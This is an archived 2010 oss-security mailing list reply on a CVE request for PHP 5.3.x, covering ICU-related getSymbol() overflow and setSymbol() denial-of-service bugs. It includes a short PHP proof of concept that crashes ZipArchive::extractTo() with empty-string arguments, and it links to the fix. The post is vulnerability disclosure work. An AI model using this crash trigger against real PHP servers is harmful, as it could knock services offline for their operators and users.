Date: Tue, 7 Dec 2010 22:43:17 +0000 (UTC) From: Maksymilian Arciemowicz <cxib@...urityreason.com> To: oss-security@...ts.openwall.com Subject: Re: CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900) Tomas Hoger <thoger@...> writes: > Btw, setSymbol() is affected too, and does not seem to be addressed in > r305571. In both cases, it's PHP exposing ICU bug. > setSymbol() give only DoS with strlen(NULL) [CWE-170]. getSymbol() Integer overflow which causes heap overflow. see also ZipArchive:extractTo() Possible CWE-170 strlen(NULL) PoC: <?php $zip = new ZipArchive; $zip->open('./dupa.zip'); var_dump($zip->extractTo('/tmp', array('', ''))); ?> Fix: http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?view=log
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.